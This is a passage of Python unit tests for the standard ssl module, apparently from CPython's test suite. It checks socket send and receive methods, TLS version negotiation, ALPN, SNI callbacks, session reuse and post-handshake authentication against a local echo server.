msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
            # Switch back to blocking mode and close the connection
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
client_ctx, server_ctx, hostname = testing_context()
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
server = server_ctx.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
            # Signal the main thread, block in accept(), then echo four
            # bytes back.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
        # Client waits until the server is set up, then connects.
evt.wait()
client = client_ctx.wrap_socket(
socket.socket(), server_hostname=hostname
)
client.connect((hostname, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
        # OpenSSL enables all TLS 1.3 ciphers; enforce TLS 1.2 for this test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.3')
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
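    # The version tests below pin TLS versions through
    # SSLContext.minimum_version / SSLContext.maximum_version and then check
    # SSLSocket.version() (or the resulting handshake alert) to confirm what
    # was actually negotiated.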
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
client_context, server_context, hostname = testing_context()
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_tls_version('TLSv1_1')
@ignore_deprecation
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
client_context, server_context, hostname = testing_context()
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
with self.assertRaises(ssl.SSLError):
server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
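    # ALPN results are checked on both sides: the client's choice comes from
    # SSLSocket.selected_alpn_protocol(), exposed here as
    # stats['client_alpn_protocol'], while the server side is collected in
    # ThreadedEchoServer.selected_alpn_protocols and exposed as
    # stats['server_alpn_protocols'].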
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_npn_protocols(self):
assert not ssl.HAS_NPN
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
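    # set_servername_callback() callbacks receive
    # (ssl_sock, server_name, initial_context).  The tests below cover the
    # three outcomes the server reacts to: switching ssl_sock.context to
    # serve a different certificate, returning an ALERT_DESCRIPTION_* code,
    # and raising an exception (which surfaces as a handshake failure alert
    # on the client).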
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
        # The other_context certificate (CN 'fakehostname') was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(os_helper.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with open(os_helper.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
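    # Session reuse in these tests works by grabbing stats['session'] from a
    # first server_params_test() run and feeding it back through the
    # session= keyword (which is passed on to wrap_socket()), then checking
    # stats['session_reused'] and SSLContext.session_stats().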
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
def msg_cb(conn, direction, version, content_type, msg_type, data):
if support.verbose and content_type == _TLSContentType.ALERT:
info = (conn, direction, version, content_type, msg_type, data)
sys.stdout.write(f"TLS: {info!r}\n")
server_context._msg_callback = msg_cb
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
with self.assertRaisesRegex(
ssl.SSLError,
'tlsv13 alert certificate required'
):
# receive CertificateRequest
self.assertEqual(s.recv(1024), b'OK\n')
# send empty Certificate + Finished
s.write(b'HASCERT')
# receive alert
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
